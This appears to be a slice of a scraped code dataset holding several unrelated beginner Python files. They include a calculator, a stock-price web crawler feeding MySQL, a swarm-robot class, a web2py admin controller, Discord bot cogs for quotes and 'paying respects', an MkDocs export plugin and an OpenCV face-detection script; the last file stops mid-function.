\",(NumberCruncher.addition(validInput1,validInput2)))\r\n#The above print line gives the user entries to the function 'addition' inside 'NumberCruncher'\r\n#The below print lines do the same with their respective functions\r\n\r\nprint(\"Your entries subtracted from one another = \",(NumberCruncher.subtraction(validInput1,validInput2)))\r\nprint(\"Your entries divided by each other = \",(NumberCruncher.divide(validInput1,validInput2)))\r\nprint(\"Your entries multiplied together = \",(NumberCruncher.multiply(validInput1,validInput2)))\r\n\r\n#Below displays same answers but in sum form\r\nprint(validInput1,\" + \", validInput2, \" = \",(NumberCruncher.addition(validInput1,validInput2)))\r\nprint(validInput1,\" - \", validInput2, \" = \",(NumberCruncher.subtraction(validInput1,validInput2)))\r\nprint(validInput1,\" / \", validInput2, \" = \",(NumberCruncher.divide(validInput1,validInput2)))\r\nprint(validInput1,\" * \", validInput2, \" = \",(NumberCruncher.multiply(validInput1,validInput2)))\r\n\r\n\r\n#NOW TO USE THE DATA IN A DIFFERENT WAY\r\n\r\n\r\nadditionAnswer = (NumberCruncher.addition(validInput1,validInput2)) #loads answer from addition function, and so on for the next 3 lines\r\nsubAnswer = (NumberCruncher.subtraction(validInput1,validInput2))\r\ndivAnswer = (NumberCruncher.divide(validInput1,validInput2))\r\ntimesAnswer =(NumberCruncher.multiply(validInput1,validInput2))\r\n\r\n#Loads new variables with data to pass test for zero function\r\nsubZeroCheck =(NumberCruncher.notZero(subAnswer)) #passes subAnswer to zeroCheck function in NumberCruncher class\r\naddZeroCheck =(NumberCruncher.notZero(additionAnswer)) #passes additionAnswer to zeroCheck function in NumberCruncher class\r\ndivZeroCheck =(NumberCruncher.notZero(divAnswer)) #passes divAnswer to zeroCheck function in NumberCruncher class\r\ntimesZeroCheck =(NumberCruncher.notZero(timesAnswer)) #passes timesAnswer to zeroCheck function in NumberCruncher class\r\n\r\n#prints zero check results\r\nprint(\"Did adding give zero as an answer? :\",addZeroCheck) #these lines should explain themselves\r\nprint(\"Did subtracting give zero as an answer? :\",subZeroCheck)\r\nprint(\"Did dividing give zero as an answer? :\",divZeroCheck)\r\nprint(\"Did multiplying give zero as an answer? :\",timesZeroCheck)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Number_Advanced4-3.py","file_name":"Number_Advanced4-3.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472175798","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib\nimport datetime\nimport time\n\nimport pymysql as pysql\n\ndef insertStock(arr):\n    conn = pysql.connect(host='localhost', port=3307, user='root', password='python', db='pydb', charset='utf8')\n    cur = conn.cursor()\n    \n    sql = \"\"\"INSERT INTO stock (s_name, s_code, price, crw_date)\n            VALUES(%s, %s, %s, %s)\"\"\"\n
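    \n    # executemany runs this INSERT once per tuple in arr; each row is e.g.\n    # ('SomeStock', '005930', '81000', '20240101,0930') -- illustrative values only.\n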
:\",timesZeroCheck)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Number_Advanced4-3.py","file_name":"Number_Advanced4-3.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472175798","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib\nimport datetime\nimport time\n\nimport pymysql as pysql\n\ndef insertStock(arr):\n conn = pysql.connect(host='localhost', port=3307, user='root', password='python', db='pydb', charset='utf8')\n cur = conn.cursor()\n \n sql = \"\"\"INSERT INTO stock (s_name, s_code, price, crw_date)\n VALUES(%s, %s, %s, %s)\"\"\"\n \n cnt = cur.executemany(sql, arr) \n print(cnt)\n \n conn.commit()\n cur.close()\n conn.close()\ncount = 0\nfor i in range(10):\n response = requests.get(\"http://stock.hankyung.com/apps/rank.panel_sub?market=1\")\n response.encoding = \"euc-kr\"\n soup = BeautifulSoup(response.text, \"html.parser\")\n sbjs = soup.select(\".sbj\")\n \n crw_date = datetime.datetime.now().strftime(\"%Y%m%d,%H%M\")\n \n arr = []\n count += 1\n for sbj in sbjs:\n s_name = sbj.text\n s_code = sbj.a[\"href\"].split(\"=\")[1]\n price = sbj.parent.select(\"td\")[1].text.replace(\",\", \"\")\n arr.append((s_name,s_code,price,crw_date))\n \n insertStock(arr)\n print(count,\"번째 인서트중\")\n time.sleep(60)\n\n\n \n \n\n\n","sub_path":"HelloPython/day08/mycrawl06stock.py","file_name":"mycrawl06stock.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382761517","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Robot(object):\n def __init__(self,x,y,vx,vy,taille,collision_avoidance_coefficient,aggressive_flocking_coefficient,collision_sensibility_radius):\n self.x = x\n self.y = y\n self.vx = vx\n self.vy = vy\n self.taille = taille\n self.collision_avoidance_coefficient = collision_avoidance_coefficient\n self.aggressive_flocking_coefficient = aggressive_flocking_coefficient\n self.collision_sensibility_radius = collision_sensibility_radius\n\n def position(self):\n return(np.array([self.x,self.y]))\n\n def imprime_robot(self,ax):\n size = self.taille\n x_1 = self.x\n y_1 = self.y\n color = np.array([\"green\"])\n ax.scatter(x_1,y_1,s=size,c=color)\n","sub_path":"projet robots/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297263178","text":"# coding: utf8\n# intente algo como\ndef asignarPermiso():\n listado = db(db.auth_user.registration_key == 'pending').select(db.auth_user.id,db.auth_user.dni, db.auth_user.first_name, db.auth_user.last_name, db.auth_user.email,db.auth_user.registration_key)\n\n tabla = SQLTABLE((listado),\n headers={'auth_user.id':'ID', \n 'auth_user.dni':'DNI', \n 'auth_user.first_name':'Nombre',\n 'auth_user.last_name':'Apellido',\n 'auth_user.email':'E-mail',\n 'auth_user.registration_key':'Estado'},\n linkto ='editar')\n form=SQLFORM(db.auth_membership)\n if form.accepts(request.vars,session):\n response.flash='Se asigno membresia'\n return dict (form = form, tabla = tabla)\n\ndef editar():\n id = request.args[1]\n query = db(db.auth_user.id == id).select(db.auth_user.last_name,db.auth_user.first_name,db.auth_user.registration_key)\n form = SQLFORM(db.auth_user, id, fields = ['last_name','first_name','registration_key'] )\n if form.accepts(request.vars,session):\n response.flash 
    form=SQLFORM(db.auth_membership)\r\n    if form.accepts(request.vars,session):\r\n        response.flash='Membership assigned'\r\n    return dict (form = form, tabla = tabla)\r\n\r\ndef editar():\r\n    id = request.args[1]\r\n    query = db(db.auth_user.id == id).select(db.auth_user.last_name,db.auth_user.first_name,db.auth_user.registration_key)\r\n    form = SQLFORM(db.auth_user, id, fields = ['last_name','first_name','registration_key'] )\r\n    if form.accepts(request.vars,session):\r\n        response.flash = 'Done!'\r\n        redirect(URL(r=request, f='asignarPermiso'))\r\n    elif form.errors:\r\n        response.flash = 'There are one or more errors'\r\n    return dict(form = form)\r\n","sub_path":"controllers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281441332","text":"import discord\nfrom redbot.core import commands\nimport asyncio\n\nclass PressF(commands.Cog):\n    \"\"\"You can now pay respect to a person\"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.messager = {}\n        self.messagem = {}\n
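        # self.messager tracks, per channel id, who has paid respects via the F\n        # reaction; self.messagem does the same for typed \"f\" messages when the\n        # reaction could not be added.\n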
\n    @commands.command(pass_context=True, no_pm=True)\n    async def pressf(self, ctx, user: discord.User=None):\n        \"\"\"Pay Respects by pressing f\"\"\"\n\n        author = ctx.author\n        channel = ctx.channel\n\n        if channel.id in self.messager or channel.id in self.messagem:\n            return await ctx.send(\"Oops! I'm still paying respects in this channel, you'll have to wait until I'm done.\")\n        \n        def check_message(m):\n            return (m.author == author and m.channel == channel)\n\n        if user:\n            answer = user.display_name\n        else:\n            await ctx.send(\"What do you want to pay respects to?\")\n            message = await self.bot.wait_for(\"message\", check=check_message, timeout=120.0)\n\n            if message is None:\n                return await ctx.send(\"You took too long to reply.\")\n            \n            answer = message.content\n        \n        msg = f\"Everyone, let's pay respects to **{answer}**! Press the F reaction on this message to pay respects.\"\n\n        message = await ctx.send(msg)\n\n        try:\n            await message.add_reaction(\"\\U0001f1eb\")\n            self.messager[channel.id] = []\n            react = True\n        except:\n            self.messagem[channel.id] = []\n            react = False\n            await message.edit(content=f\"Everyone, let's pay respects to **{answer}**! Press the F reaction on this message to pay respects.\")\n\n        def check(m):\n            return m.channel == ctx.channel\n\n        await self.bot.wait_for(\"message\", check=check)\n\n        await asyncio.sleep(120)\n        await message.delete()\n\n        if react:\n            amount = len(self.messager[channel.id])\n        else:\n            amount = len(self.messagem[channel.id])\n\n        amount_of_people = \"person has\" if str(amount) == \"1\" else \"people have\"\n        await channel.send(f\"**{amount}** {amount_of_people} paid respects to **{answer}**.\")\n        \n        if react:\n            del self.messager[channel.id]\n        else:\n            del self.messagem[channel.id]\n    \n    async def on_reaction_add(self, reaction, user):\n        message = reaction.message\n        channel = message.channel\n\n        if user.id == self.bot.user.id:\n            return\n        if channel.id not in self.messager:\n            return \n        if user.id not in self.messager[channel.id]:\n            if str(reaction.emoji) == \"\\U0001f1eb\": \n                await channel.send(f\"**{user.mention}** has paid respects.\")\n                self.messager[channel.id].append(user.id)\n\n    async def on_message(self, message):\n        channel = message.channel\n        user = message.author\n\n        if channel.id not in self.messagem:\n            return \n        if user.id not in self.messagem[channel.id]:\n            if message.content.lower() == \"f\":\n                await channel.send(f\"**{user.mention}** has paid respects.\")\n                self.messagem[channel.id].append(user.id)\n","sub_path":"cherubim/pressf.py","file_name":"pressf.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350696901","text":"# -*- coding: utf-8 -*-\n__author__ = 'Sally Wang'\n\nfrom bs4 import BeautifulSoup\nimport re\nfrom decimal import Decimal as D\nfrom commons import common\nfrom commons.const import const\nfrom testCase.departments.testGetDepartment import GetDepartment\nfrom testCase.users import testGetUser as users\n\nclass GetLeads:\n    def __init__(self, cookie, csrf):\n        #'https://e.ikcrm.com/\n        # self.base_url = base_url\n        self.common = common.Common(cookie, csrf)\n        self.base_url = const.BASE_URL\n        self.base_url2 = const.SIGN_IN_BASE_URL\n        self.testGetDepartment = GetDepartment(cookie, csrf)\n        self.user = users.GetUser(cookie, csrf)\n        self.csrf = csrf\n        self.cookie = cookie\n        pass\n\n    # Get the scope tabs used to query the leads page: all my leads, my subordinates' leads, my own leads\n    def get_all_scope(self):\n        url = self.base_url + 'leads/'\n        params = {\n            'scope':'all_own',\n            'section_only':'true'\n        }\n        response = self.common.get_response_json(url, params, 'get the scopes of the leads page')\n        soup = BeautifulSoup(response.content, 'html.parser')\n        scopes = re.findall(r\"leads\\?scope=(.*?)\\\">\",str(soup))\n
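        # the regex pulls the scope keys out of the tab links, giving a list\n        # like ['all_own', 'sub_own', 'my_own'] (illustrative values)\n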
        return scopes\n\n    # Lead duplicate check\n    def duplicate_leads(self):\n        url = self.base_url + 'duplicate'\n        params = {\n            'add': 'yes',\n            'key': 'lead'\n        }\n        self.common.get_response_json(url, params, 'open the lead duplicate check')\n        url = self.base_url + 'duplicate/search'\n        params = {\n            'key': 'lead',\n            'query': '1323234'\n        }\n        response = self.common.get_response_json(url, params, 'run the lead duplicate check')\n        # TODO: create a new lead once the duplicate check returns no data\n        if response:\n            print (\"Lead duplicate check passed!\")\n        else:\n            print (\"Sorry, the lead duplicate check failed!\")\n\n    # Get the lead ids on the current page\n    def lead_ids(self):\n        url = self.base_url + 'leads'\n        body = {\n            'order': 'asc',\n            'scope': 'all_own',\n            'sort': 'leads.updated_at desc',\n            'per_page': 10,\n            'type': 'advance',\n            'section_only': 'true'\n        }\n        response = self.common.get_response_json(url, body, 'get the leads on the current page')\n        if not response:\n            return {}\n        self.response = response\n        S = self.response.content\n        soup = BeautifulSoup(S, \"html.parser\")\n        # print(soup)\n        checked_lead = soup.find(attrs={'data-entity-table-name': 'lead'})\n        if checked_lead:\n            a = str(checked_lead)\n            lead_id_list = re.findall(r\"data-id=\\\"(.*?)\\\">\", a)\n            return lead_id_list\n\n    # Export the selected leads\n    def export_selected_leads(self, scope):\n        lead_ids = self.lead_ids()\n        url = self.base_url + 'leads?export_page=1&format_type=calculate_export_pages&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance&selected_ids%5B%5D=' + \\n            lead_ids[0] + '&selected_ids%5B%5D=' + lead_ids[1] + '&format=js'\n        self.common.get_response_json(url, {}, 'export_selected_leads')\n        url = self.base_url + 'leads.js?export_page=1&format_type=xlsx&order=asc&per_page=10&scope=' + scope + '&selected_ids%5B%5D=' + \\n            lead_ids[0] + '&selected_ids%5B%5D=' + lead_ids[1] + '&sort=leads.updated_at+desc&type=advance'\n        self.common.get_response_json(url, {}, 'execute download of the exported selected-leads file')\n\n    # Export all leads\n    def export_all_leads(self, scope):\n        url = self.base_url + 'leads?format_type=calculate_export_pages&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance'\n        self.common.get_response_json(url, {}, 'export_all_leads')\n\n        # click to download the document\n        url = self.base_url + 'leads?export_page=1&format_type=xlsx&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance'\n        self.common.get_response_json(url, {}, 'execute download of the exported all-leads file')\n\n    # Get the details of a single lead\n    def get_lead(self, lead_id):\n        url = self.base_url + 'leads/' + str(lead_id)\n        body = {}\n        response = self.common.get_response_json(url, body, 'get current lead details')\n        if response != False:\n            soup = BeautifulSoup(response.content, 'html.parser')\n            return soup\n\n\n\n    # View the lead's tasks\n    def get_events(self, lead_id):\n        url = self.base_url + 'events?entity_id='+str(lead_id)+'&entity_klass=Lead'\n        params = {\n            'entity_id': lead_id,\n            'entity_klass': 'Lead'\n        }\n        self.common.get_response_json(url, params, 'get current lead tasks')\n\n    # View the lead's attachments\n    def get_attachment(self, lead_id):\n        url = self.base_url + 'api/attachments?page=&perPage=15&entity_id='+str(lead_id)+'&klass=Lead&sub_type=file'\n        params = {\n            'page':'',\n            'perPage':15,\n            'entity_id':lead_id,\n            'klass':'Lead'\n        }\n        self.common.get_response_json(url, params, 'get current lead attachments')\n\n    # View the lead's operation logs\n    def get_operation_logs(self, lead_id):\n        url = self.base_url + 'api/operation_logs?page=&perPage=15&loggable_id='+str(lead_id)+'&loggable_type=Lead'\n        params = {\n            'page':'',\n            'perPage':15,\n            'loggable_id':lead_id,\n            'loggable_type':'Lead'\n        }\n        self.common.get_response_json(url, params, 'view lead operation logs')\n","sub_path":"testCase/leads/testGetLeads.py","file_name":"testGetLeads.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237615420","text":"import cv2\nimport numpy as np\nimport os\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#CascadeClassifier object and file contains the face features\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\ncap=cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,700)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,700)\npath='/home/pranjal/Desktop/RM/RM-Coding-kids/Pranjal/OpenCV/Haar_Cascade_Classifier'\ni,j=0,0\nwhile True:\n    ret,img=cap.read()\n    gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    faces=face_cascade.detectMultiScale(gray,1.5,5) #Helps to find the face co-ordinates\n    #1.5 is the scale factor . Decrease the shape value until the\n    #face is found . Smaller the value , greater the accuracy\n    for (x,y,w,h) in faces:\n        cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2) # Getting the coordinates for the face rectangle\n        #Remove comments to use eye detection\n        \"\"\"\n        roi_gray=gray[y:y+h,x:x+h]\n        roi_color=img[y:y+h,x:x+h]\n        eyes=eye_cascade.detectMultiScale(roi_gray,1.3,5)\n        for ex,ey,ew,eh in eyes:\n            cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(255,0,0),2)\n        \"\"\"\n\n    var=cv2.waitKey(1)\n    if var == ord('q'):\n        break\n\n    #Saving screenshots for collecting images for dataset\n    elif var == ord('p'):\n        cv2.imwrite(os.path.join(path,'face{}{}.png'.format('Pranjal',i)),img)\n        i=i+1\n    elif var == ord('d'):\n        cv2.imwrite(os.path.join(path,'face{}{}.png'.format('Diwij',j)),img)\n        j=j+1\n    cv2.imshow('face',img)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Second_Years/Pranjal/OpenCV/Haar_Cascade_Classifier/.ipynb_checkpoints/openCV_Face_detection-checkpoint.py","file_name":"openCV_Face_detection-checkpoint.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436516763","text":"from mkdocs.plugins import BasePlugin\nimport os\n\nclass MarkdownRenamePlugin(BasePlugin):\n    # these are obviously paths\n    export_path = os.path.join(os.getcwd(), 'export')\n    asset_export_path = os.path.join(export_path, 'edw-assets')\n    site_path = os.path.join(os.getcwd(), 'site')\n\n    # this dictionary will hold all of the html file names for each Page\n    ex = dict()\n\n    # make the export_path if it doesn't already exist\n    if not os.path.exists(export_path): os.mkdir(os.path.join(export_path))\n    \n    # Here we are going to take the already built `site_navigation` object and make our own dictionary object with the file names \n    # we are going to need for the UDH Documentation Site.\n    # The description per MkDocs' own documentation { https://www.mkdocs.org/user-guide/plugins/#on_nav } states as follows:\n    # \"The `nav` event is called after the site navigation is created and can be used to alter the site navigation.\"\n    def on_nav(self, site_navigation, config):\n        print('\\nbuilding file list'.upper())\n        self.ex = { \n            nav.title: 'index.html' if nav.url.strip('/').split('/')[-1] == '.' else '{}.html'.format(nav.url.strip('/').split('/')[-1]) \n            for nav in site_navigation \n        }\n
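        # for illustration, self.ex ends up mapping page titles to flat file names,\n        # e.g. {'Home': 'index.html', 'Getting Started': 'getting-started.html'}\n        # (hypothetical titles)\n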
        print('... file list built successfully')\n        return site_navigation\n\n    # We only call this event because it happens before any of the page content is handled, and the page-content handling\n    # is where most of our manipulation occurs. I only wanted the message \"begin export\" to fire once before we start exporting,\n    # so I put it here.\n    # A full description of this event can be found at https://www.mkdocs.org/user-guide/plugins/#on_post_template\n    # in case we want to use it for something a little more worthy of its existence later.\n    def on_post_template(self, output_content, template_name, config):\n        print('\\nbegin exporting'.upper())\n        print('\\ncontent ---')\n        return output_content\n\n    # Here is where the bulk of the 'magic' happens.\n    # The event is called for every file that is rendered; we take its contents and put them into the file\n    # that will be exported.\n    # The description per MkDocs' own documentation { https://www.mkdocs.org/user-guide/plugins/#on_post_page } states as follows: \n    # \"The `post_template` [sic] event is called after the template is rendered, but before it is written to disc and can be used \n    # to alter the output of the page. If an empty string is returned, the page is skipped and nothing is written to disc.\"\n    def on_post_page(self, site_navigation, page, config):\n        filename = self.ex[page.title]\n        export_fullpath = os.path.join(self.export_path, filename) \n        # do the actual thing\n        with open(os.path.join(export_fullpath), \"w\") as f:\n            f.write(site_navigation)\n        print('... {} exported successfully'.format(filename))\n\n        # return the content for the real mkdocs functionality \n        return site_navigation\n\n    def on_post_build(self, config):\n        # at the time of this writing we already know the structure of the file tree and that there is only \n        # one child directory in any of the folders we are looping through.\n        # a better and more general solution would be to turn this entire routine into a recursively called function, \n        # but this will do for now\n        print('\\nassets ---')\n        # first things first, check if the exports folder for assets exists and if not make it\n        if not os.path.exists(self.asset_export_path): os.mkdir(self.asset_export_path)\n        for pth in config['assetpaths']:\n            # is it a directory? \n            for n in os.listdir(os.path.join(self.site_path, pth)):\n                # it is? then loop through all of its children\n                # are any of these directories? \n                if os.path.isdir(os.path.join(self.site_path, pth, n)):\n                    # found one? then make its equivalent folder under the exports folder, then loop through and copy the files.
\n if not os.path.exists(os.path.join(self.asset_export_path, n)): os.mkdir(os.path.join(self.asset_export_path, n))\n # now lets actually cycle through and copy files from the origin { site_path/pth/n } \n # to their new, if temporary, home { asset_export_path/n/f }\n for f in os.listdir(os.path.join(self.site_path, pth, n)):\n content = self.get_asset_file(os.path.join(pth, n, f))\n if content is not None:\n filename = os.path.join(self.asset_export_path, n, f)\n with open(filename, \"w\") as w:\n w.write(content)\n print('... {} exported successfully'.format(os.path.join(pth, n, f)))\n else:\n # it's not? then just put the file where it needs to go\n content = self.get_asset_file(os.path.join(pth, n))\n if content is not None:\n filename = os.path.join(self.asset_export_path, n)\n with open(filename, \"w\") as w:\n w.write(content)\n print('... {} exported successfully'.format(os.path.join(pth, n)))\n\n # this is just a helper function that gets the content for the file path provided. \n def get_asset_file(self, _pth):\n filename = os.path.join(self.site_path, _pth)\n if os.path.exists(filename):\n with open(filename, \"r\") as f:\n return f.read()\n else:\n print('Unable to locate the file {}'.format(filename))\n return None","sub_path":"mkdocs-mkrename-plugin/mkrename/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261570869","text":"import webapp2, json, sys, views\nfrom google.appengine.ext import ndb\nfrom google.appengine.datastore.datastore_query import Cursor\nsys.path.insert(0,'libs')\nimport models\n\n\nclass MusicianHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tmusician = ndb.Key(urlsafe = self.request.get('id')).get()\n\n\t\tif user:\n\t\t\tif musician.user_key == user.key: \n\t\t\t\thide_follow = True \n\t\t\t\tuser_following = False\n\n\t\t\telse:\n\t\t\t\thide_follow = False\n\t\t\t\tuser_following = models.following.Following.get_by_keys(self.user_check().key, musician.key)\n\t\telse:\n\t\t\tuser_following = False\n\t\t\thide_follow = True\n\n\t\t#query all videos for this artist\n\t\tvideos = models.videos.Videos.fetch_by_musician(musician.key)\n\n\t\t#count of musicians by state\n\t\ttotal_musicians = models.musician.Musician.count_by_state(musician.musician_state)\n\t\t\t\n\n\t\t\n\t\ttemplate_values = {'hide':hide_follow,\n\t\t\t\t\t\t 'musician':musician, \n\t\t\t\t\t\t 'videos':videos, \n\t\t\t\t\t\t 'call_b':str(self.request.path), \n\t\t\t\t\t\t 'is_following':user_following,\n\t\t\t\t\t\t 'state_count':total_musicians}\n\t\t\t\t\t\t \n\t\tself.render('musician.html', template_values)\n \t\t \t\t \t\t\napp = webapp2.WSGIApplication([\n \n ('/musician*', MusicianHandler)\n \n], debug=True)\n\n\n","sub_path":"musician.py","file_name":"musician.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376954377","text":"import discord\nfrom discord.ext import commands\nimport random\nimport config\nimport quotes\nimport asyncio\nfrom discord.ext.commands import cooldown\nimport string\n \nprint(' _ __ _ ____ _ ')\nprint(' | |/ /___| |_ ___ | __ ) ___ | |_ ')\nprint(' | . // _ \\ __/ _ \\| _ \\ / _ \\| __|')\nprint(' | . 
\\ __/ || (_) | |_) | (_) | |_ ')\nprint(' |_|\\_\\___|\\__\\___/|____/ \\___/ \\__|')\nprint(' ')\n \nbot = commands.Bot(command_prefix=config.prefix)\nbot.remove_command(\"help\")\n \n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Game(name=\";help | Keylogging Keto\"))\n print('------')\n print('Ready!')\n print('------')\n print('Logged in as:')\n print(bot.user.name)\n print('------')\n print('Connected to:')\n for server in bot.guilds:\n print(' ')\n print(server.name)\n print(server.id)\n print('------')\n print('© Toilet Cat Technologies')\n print('------')\n \nasync def self_check(ctx):\n if 637090083144728576 == ctx.message.author.id:\n return True\n else:\n await ctx.send(f\"<@{ctx.author.id}> is not in the sudoers file. This incident will be reported.\")\n# A secondary check to ensure nobody but the owner can run these commands.\n\n@bot.command()\nasync def help(ctx):\n embed=discord.Embed(title=\"Gordo Quotes\", url=\"https://toilet.cat/\", description=\"Quoting bitches since 2019.\")\n embed.set_thumbnail(url=\"https://raw.githubusercontent.com/xstecky/xstecky.github.io/master/toilet_cat.gif\")\n embed.add_field(name=\"Prefix\", value=\"``;``\", inline=False)\n embed.add_field(name=\"Quotes\", value=\"``ketoquote`` ``humanquote`` ``gaynasaquote`` ``gordoquote`` ``ramsquote``\", inline=False)\n embed.add_field(name=\"Fun\", value=\"``m8b`` ``gordoalt``\", inline=True)\n embed.add_field(name=\"Info\", value=\"``github``\", inline=True)\n embed.add_field(name=\"Other\", value=\"``say`` ``changegame``\", inline=True)\n embed.set_footer(text=\"© Toilet Cat Technologies\")\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested the help embed in {ctx.guild.name}!\")\n\n@bot.command()\nasync def m8b(ctx):\n messages = [\"Yes.\", \"No.\", \"Ask Gordo.\", \"Absolutely.\", \"Fuck no.\", \"Yes – definitely.\", \"Bruh. Really?\", \"Star Keto Bot on GitHub, then I'll answer.\", \"Error 523: Can't reach toilet.cat/8banswers.json\", \"Don't count on it.\", \"I need a Juul hit before I can give an accurate answer.\"]\n m8b = (ctx.message.content)\n embed=discord.Embed(title=\"Magic 8-Ball\")\n embed.set_thumbnail(url=\"https://raw.githubusercontent.com/xstecky/Keto-Bot/master/8ballgordo.png\")\n embed.add_field(name=\"Question:\", value=(m8b.replace(';m8b','')), inline=False)\n embed.add_field(name=\"Answer:\", value=(random.choice(messages)), inline=False)\n embed.set_footer(text=\"Asked by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} used the magic 8-Ball in {ctx.guild.name}! ({ctx.message.content})\")\n\n@commands.check(self_check)\n@bot.command()\nasync def say(ctx, *, text):\n await ctx.send(text)\n print (f\"{ctx.message.author.name} used the say command in {ctx.guild.name}! ({ctx.message.content})\")\n\n@bot.command()\nasync def github(ctx):\n await ctx.send('https://github.com/xstecky/Keto-Bot')\n print (f\"{ctx.message.author.name} requested the GitHub URL in {ctx.guild.name}!\")\n\n@commands.check(self_check)\n@bot.command()\nasync def changegame(ctx, *, text):\n await bot.change_presence(activity=discord.Game(name=(text)))\n await ctx.send('done :zany_face:')\n print (f\"{ctx.message.author.name} changed Keto's status in {ctx.guild.name}! 
({ctx.message.content})\")\n\n@commands.check(self_check)\n@bot.command()\nasync def debug(ctx):\n await ctx.send('fuck <@643943061893808148> :rage:')\n print (f\"{ctx.message.author.name} debugged in {ctx.guild.name}!\")\n\n@bot.command()\nasync def ketoquote(ctx):\n messages = quotes.keto\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Keto requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Keto quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def humanquote(ctx):\n messages = quotes.human\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Human requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Human quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def gaynasaquote(ctx):\n messages = quotes.gaynasa\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Gay Nasa requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Gay Nasa quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def gordoquote(ctx):\n messages = quotes.gordo\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Gordo requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Gordo quote in {ctx.guild.name}!\")\n\n@bot.command()\nasync def ramsquote(ctx):\n messages = quotes.rams\n embed=discord.Embed(title=\"\", description=random.choice(messages))\n embed.set_footer(text=\"Dieter Rams requested by {}\".format(ctx.message.author.name))\n await ctx.send(embed=embed)\n print (f\"{ctx.message.author.name} requested a Dieter Rams quote in {ctx.guild.name}!\")\n\n@bot.command()\n@cooldown(1, 16) # 1000 second cooldown\nasync def gordoalt(ctx):\n message = await ctx.send('SCANNING FOR GORDO ALTS...')\n await message.edit(content='SCANNING FOR GORDO ALTS...')\n await asyncio.sleep(2)\n await message.edit(content='10% [▰▱▱▱▱▱▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='20% [▰▰▱▱▱▱▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='30% [▰▰▰▱▱▱▱▱▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='40% [▰▰▰▰▱▱▱▱▱▱]')\n await asyncio.sleep(2)\n await message.edit(content='50% [▰▰▰▰▰▱▱▱▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='60% [▰▰▰▰▰▰▱▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='70% [▰▰▰▰▰▰▰▱▱▱]')\n await asyncio.sleep(0.5)\n await message.edit(content='80% [▰▰▰▰▰▰▰▰▱▱]')\n await asyncio.sleep(1)\n await message.edit(content='90% [▰▰▰▰▰▰▰▰▰▱]')\n await asyncio.sleep(2)\n await message.edit(content='100% [▰▰▰▰▰▰▰▰▰▰]')\n await asyncio.sleep(2)\n defaultmembers = 0\n for member in ctx.guild.members:\n if member.avatar == None:\n defaultmembers += 1\n complete = [\"ATTENTION ALL ADMINS: GORDO ALT IN GENERAL!\"]\n if defaultmembers == 0:\n complete.append(f\"{len(ctx.guild.members)} 